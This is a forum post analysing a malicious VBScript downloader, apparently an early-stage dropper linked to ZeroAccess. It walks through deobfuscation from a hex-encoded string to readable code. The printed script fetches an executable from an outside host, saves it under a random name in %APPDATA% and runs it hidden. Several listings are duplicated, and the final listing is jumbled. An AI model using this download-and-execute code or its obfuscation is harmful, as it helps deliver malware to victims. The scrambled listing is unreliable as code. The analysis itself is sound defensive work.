- May 14, 2016
- 1,597
1.vbs
2/53
https://www.virustotal.com/en/file/...bb68230d813bf8272f74b4409f337870a12/analysis/
exe file dropped : BehavesLike.Win32.ZeroAccess.mm
temporary random name + ".exe"
radB8945.tmp.exe
in %APPDATA%\
"C:\Users\DardiM\AppData\Roaming\"
As often, I will make an analysis of the downloader script, deobfuscating it.
I have chosen this sample because it is fresh and not currently detected by most AV / anti-malware tools
After I unzipped 1.vbs :
when I began this post :
- Not detected by KTS, ZAM (licence )
- Detected by Crystal Security cloud engine as soon as I ran it (CS) : 4 AVs
- VoosooShield detected it and report 2 threats : Block both file was recommended
Script used : Visual Basic Scripting
(1) Quick analysis
This script contains 34 lines of 2049 chars, 1 line of 2080 chars
all 34 lines are only put to make it "harder" to see the real interesting part.
If you edit the file with "wrap" enable, it looks like an incoherent "language" everywhere (or may be an extraterrestrial language
)
=> it's better to deactivated this option to analyse our sample
All 34 useless lines begin by ' => normally used to put comment on code, here it put text to obfuscate a lot of more the whole script, but as comment, all the lines can be deleted
We can eliminate all the line beginning by the char '
Whe then keep only the line 17 with the real important part
=> line 17 :
Function JXAHJSM(s): Dim g,a: For g=1 To Len(s) Step 2:a=a & Chr("&H" & Mid(s,g,2)):Next:JXAHJSM= a:EndMid(s,g,2)):Next:JXAHJSM= a:End Function:Execute(JXAHJSM("4F6E204572726F72205265737 ................456E642049663A")):
The first function is not to hard to understand : it receives as parameter a string (in red above - only a small part because there is 1948 chars), and 2 chars by 2 chars a modification is made.
Chr("&H" & Mid(s,g,2)) => HEX to ASCII conversion
The second function executes the first one
(2) HEX to ASCII
We can see on the spoiler that the main conversion function is used several times.
(3) HEX to ASCII one more time
It's now easier to understand some parts
Lets simplified some parts to make them completely deobfuscated
(4) Last step, with some formatting
I wrote "NAME.php" only for security, that's not the real file name
On Error Resume Next: => Specifies that when a run-time error occurs, control goes to the statement immediately following the statement where the error occurred, and execution continues from that point.
On Error Resume Next:CreateObject("dc"): => generate an error that is expected because "dc" as no mean for CreateObject function
If Err.Number>0 Then => right : can continue because the first CreateObject "worked" as expected
"WScript.Shell" to get the %APPDATA% folder and, at the end, to run the exe file
"Scripting.FileSystemObject" to build a path with %APPDATA% and a temp file name (GetTempName gives a random temp file name : .tmp extension) and to create the file
"WinHttp.WinHttpRequest.5.1" method used for the http request
"ADODB.Stream" to save (on memory stream) the content from http request (ResponseBody)
(5) Conclusion
No need to be a complicated obfuscation method to make its job ...
They may have made a more complicated conversion function too ... so thanks to them
2/53
https://www.virustotal.com/en/file/...bb68230d813bf8272f74b4409f337870a12/analysis/
exe file dropped : BehavesLike.Win32.ZeroAccess.mm
temporary random name + ".exe"
radB8945.tmp.exe
in %APPDATA%\
"C:\Users\DardiM\AppData\Roaming\"
As often, I will make an analysis of the downloader script, deobfuscating it.
I have chosen this sample because it is fresh and not currently detected by most AV / anti-malware tools
After I unzipped 1.vbs :
when I began this post :
- Not detected by KTS, ZAM (licence )
- Detected by Crystal Security cloud engine as soon as I ran it (CS) : 4 AVs
- VoosooShield detected it and report 2 threats : Block both file was recommended
Script used : Visual Basic Scripting
(1) Quick analysis
This script contains 34 lines of 2049 chars, 1 line of 2080 chars
all 34 lines are only put to make it "harder" to see the real interesting part.
If you edit the file with "wrap" enable, it looks like an incoherent "language" everywhere (or may be an extraterrestrial language
)=> it's better to deactivated this option to analyse our sample
All 34 useless lines begin by ' => normally used to put comment on code, here it put text to obfuscate a lot of more the whole script, but as comment, all the lines can be deleted
We can eliminate all the line beginning by the char '
'2SUbQ7x9dr7ct3tzc019w5 qa0zmnyiA0p 4Izb0R12im gZm2t DKzTAZyWlJB6ZijnbHdYrcSKhUNhAKcj3aZCsMG03pqB sxkGwG djwY40Zt mJt3hFxEiLON xDYrQD1 PFXmOZITUoie5NJC REu ..............
Whe then keep only the line 17 with the real important part
=> line 17 :
Function JXAHJSM(s): Dim g,a: For g=1 To Len(s) Step 2:a=a & Chr("&H" & Mid(s,g,2)):Next:JXAHJSM= a:EndMid(s,g,2)):Next:JXAHJSM= a:End Function:Execute(JXAHJSM("4F6E204572726F72205265737 ................456E642049663A")):
The first function is not to hard to understand : it receives as parameter a string (in red above - only a small part because there is 1948 chars), and 2 chars by 2 chars a modification is made.
Chr("&H" & Mid(s,g,2)) => HEX to ASCII conversion
The second function executes the first one
(2) HEX to ASCII
On Error Resume Next:CreateObject("dc"):
If Err.Number>0 Then Function CEKFRDUO(POGQVLS):
set CEKFRDUO=CreateObject(POGQVLS):End
Function:Set WCQXGR=CEKFRDUO(JXAHJSM("536372697074696E672E46696C6553797374656D4F626A656374")):
Set UZWAFBHXM=CEKFRDUO(JXAHJSM("575363726970742E5368656C6C")):
Set CXAKA=CEKFRDUO(JXAHJSM("57696E487474702E57696E48747470526571756573742E352E31")):
Set HSKWV=CEKFRDUO(JXAHJSM("41444F44422E53747265616D")):
EYWZV=WCQXGR.BuildPath(UZWAFBHXM.ExpandEnvironmentStrings("%APPDATA%"),WCQXGR.GetTempName):
On Error Resume Next:
Err.Clear:
CXAKA.Open JXAHJSM("474554"),JXAHJSM("687474703A2F2F676F706C6472746F702E746F702F6C6F672E7068703F663D312E6A7067"),0:
If Err=0 Then CXAKA.Send:HSKWV.Type=1:HSKWV.Open:HSKWV.Write CXAKA.ResponseBody:HSKWV.Position=0:EYWZV=EYWZV+JXAHJSM(".exe"):
Set MRLHFPWV=WCQXGR.CreateTextFile(EYWZV):
For QJCXYOBP=0 to lenb(CXAKA.ResponseBody)-1:
MRLHFPWV.Write chr(ascb(HSKWV.Read(1))):Next:
MRLHFPWV.Close:
UZWAFBHXM.Run EYWZV,0:
End If:
End If:
If Err.Number>0 Then Function CEKFRDUO(POGQVLS):
set CEKFRDUO=CreateObject(POGQVLS):End
Function:Set WCQXGR=CEKFRDUO(JXAHJSM("536372697074696E672E46696C6553797374656D4F626A656374")):
Set UZWAFBHXM=CEKFRDUO(JXAHJSM("575363726970742E5368656C6C")):
Set CXAKA=CEKFRDUO(JXAHJSM("57696E487474702E57696E48747470526571756573742E352E31")):
Set HSKWV=CEKFRDUO(JXAHJSM("41444F44422E53747265616D")):
EYWZV=WCQXGR.BuildPath(UZWAFBHXM.ExpandEnvironmentStrings("%APPDATA%"),WCQXGR.GetTempName):
On Error Resume Next:
Err.Clear:
CXAKA.Open JXAHJSM("474554"),JXAHJSM("687474703A2F2F676F706C6472746F702E746F702F6C6F672E7068703F663D312E6A7067"),0:
If Err=0 Then CXAKA.Send:HSKWV.Type=1:HSKWV.Open:HSKWV.Write CXAKA.ResponseBody:HSKWV.Position=0:EYWZV=EYWZV+JXAHJSM(".exe"):
Set MRLHFPWV=WCQXGR.CreateTextFile(EYWZV):
For QJCXYOBP=0 to lenb(CXAKA.ResponseBody)-1:
MRLHFPWV.Write chr(ascb(HSKWV.Read(1))):Next:
MRLHFPWV.Close:
UZWAFBHXM.Run EYWZV,0:
End If:
End If:
We can see on the spoiler that the main conversion function is used several times.
(3) HEX to ASCII one more time
On Error Resume Next:CreateObject("dc"):
If Err.Number>0 Then Function CEKFRDUO(POGQVLS):
set CEKFRDUO=CreateObject(POGQVLS):End
Function:Set WCQXGR=CEKFRDUO("Scripting.FileSystemObject"):
Set UZWAFBHXM=CEKFRDUO("WScript.Shell"):
Set CXAKA=CEKFRDUO("WinHttp.WinHttpRequest.5.1"):
Set HSKWV=CEKFRDUO("ADODB.Stream")):
EYWZV=WCQXGR.BuildPath(UZWAFBHXM.ExpandEnvironmentStrings("%APPDATA%"),WCQXGR.GetTempName):
On Error Resume Next:
Err.Clear:
CXAKA.Open "GET,"http://gopldrtop.top/NAME.php?f=1.jpg",0:
If Err=0 Then CXAKA.Send:HSKWV.Type=1:HSKWV.Open:HSKWV.Write CXAKA.ResponseBody:HSKWV.Position=0:EYWZV=EYWZV+".exe":
Set MRLHFPWV=WCQXGR.CreateTextFile(EYWZV):
For QJCXYOBP=0 to lenb(CXAKA.ResponseBody)-1:
MRLHFPWV.Write chr(ascb(HSKWV.Read(1))):Next:
MRLHFPWV.Close:
UZWAFBHXM.Run EYWZV,0:End
If:End If:
If Err.Number>0 Then Function CEKFRDUO(POGQVLS):
set CEKFRDUO=CreateObject(POGQVLS):End
Function:Set WCQXGR=CEKFRDUO("Scripting.FileSystemObject"):
Set UZWAFBHXM=CEKFRDUO("WScript.Shell"):
Set CXAKA=CEKFRDUO("WinHttp.WinHttpRequest.5.1"):
Set HSKWV=CEKFRDUO("ADODB.Stream")):
EYWZV=WCQXGR.BuildPath(UZWAFBHXM.ExpandEnvironmentStrings("%APPDATA%"),WCQXGR.GetTempName):
On Error Resume Next:
Err.Clear:
CXAKA.Open "GET,"http://gopldrtop.top/NAME.php?f=1.jpg",0:
If Err=0 Then CXAKA.Send:HSKWV.Type=1:HSKWV.Open:HSKWV.Write CXAKA.ResponseBody:HSKWV.Position=0:EYWZV=EYWZV+".exe":
Set MRLHFPWV=WCQXGR.CreateTextFile(EYWZV):
For QJCXYOBP=0 to lenb(CXAKA.ResponseBody)-1:
MRLHFPWV.Write chr(ascb(HSKWV.Read(1))):Next:
MRLHFPWV.Close:
UZWAFBHXM.Run EYWZV,0:End
If:End If:
It's now easier to understand some parts
Lets simplified some parts to make them completely deobfuscated
(4) Last step, with some formatting
On Error Resume Next:
CreateObject("dc"):
If Err.Number>0
Then
CreateObject("dc"):
If Err.Number>0
Then
Function func_CreateObject(string_object):
Set fso =CreateObject("Scripting.FileSystemObject"):
Set shell=CreateObject("WScript.Shell"):
Set obj_http =CreateObject("WinHttp.WinHttpRequest.5.1"):
Set obj_ADODBStream =CreateObject("ADODB.Stream")):
temp_Path=fso.BuildPath(shell.ExpandEnvironmentStrings("%APPDATA%"),fso.GetTempName):
On Error Resume Next:
Err.Clear:
obj_http.Open "GET","http://gopldrtop.top/NAME.php?f=1.jpg",0:
If Err=0 Then
End If:set func_CreateObject=CreateObject(string_object):
End Function:Set fso =CreateObject("Scripting.FileSystemObject"):
Set shell=CreateObject("WScript.Shell"):
Set obj_http =CreateObject("WinHttp.WinHttpRequest.5.1"):
Set obj_ADODBStream =CreateObject("ADODB.Stream")):
temp_Path=fso.BuildPath(shell.ExpandEnvironmentStrings("%APPDATA%"),fso.GetTempName):
On Error Resume Next:
Err.Clear:
obj_http.Open "GET","http://gopldrtop.top/NAME.php?f=1.jpg",0:
If Err=0 Then
obj_http.Send:
obj_ADODBStream.Type=1:
obj_ADODBStream.Open:
obj_ADODBStream.Write obj_http.ResponseBody:
obj_ADODBStream.Position=0:
temp_Path=temp_Path+".exe":
Set file =fso.CreateTextFile(temp_Path):
For QJCXYOBP=0 to lenb(obj_http.ResponseBody)-1:
file.Close:
shell.Run temp_Path,0:
End If:obj_ADODBStream.Type=1:
obj_ADODBStream.Open:
obj_ADODBStream.Write obj_http.ResponseBody:
obj_ADODBStream.Position=0:
temp_Path=temp_Path+".exe":
Set file =fso.CreateTextFile(temp_Path):
For QJCXYOBP=0 to lenb(obj_http.ResponseBody)-1:
file.Write chr(ascb(obj_ADODBStream.Read(1))):
Next:file.Close:
shell.Run temp_Path,0:
I wrote "NAME.php" only for security, that's not the real file name
On Error Resume Next: => Specifies that when a run-time error occurs, control goes to the statement immediately following the statement where the error occurred, and execution continues from that point.
On Error Resume Next:CreateObject("dc"): => generate an error that is expected because "dc" as no mean for CreateObject function
If Err.Number>0 Then => right : can continue because the first CreateObject "worked" as expected
"WScript.Shell" to get the %APPDATA% folder and, at the end, to run the exe file
"Scripting.FileSystemObject" to build a path with %APPDATA% and a temp file name (GetTempName gives a random temp file name : .tmp extension) and to create the file
"WinHttp.WinHttpRequest.5.1" method used for the http request
"ADODB.Stream" to save (on memory stream) the content from http request (ResponseBody)
(5) Conclusion
No need to be a complicated obfuscation method to make its job ...
They may have made a more complicated conversion function too ... so thanks to them
Last edited:
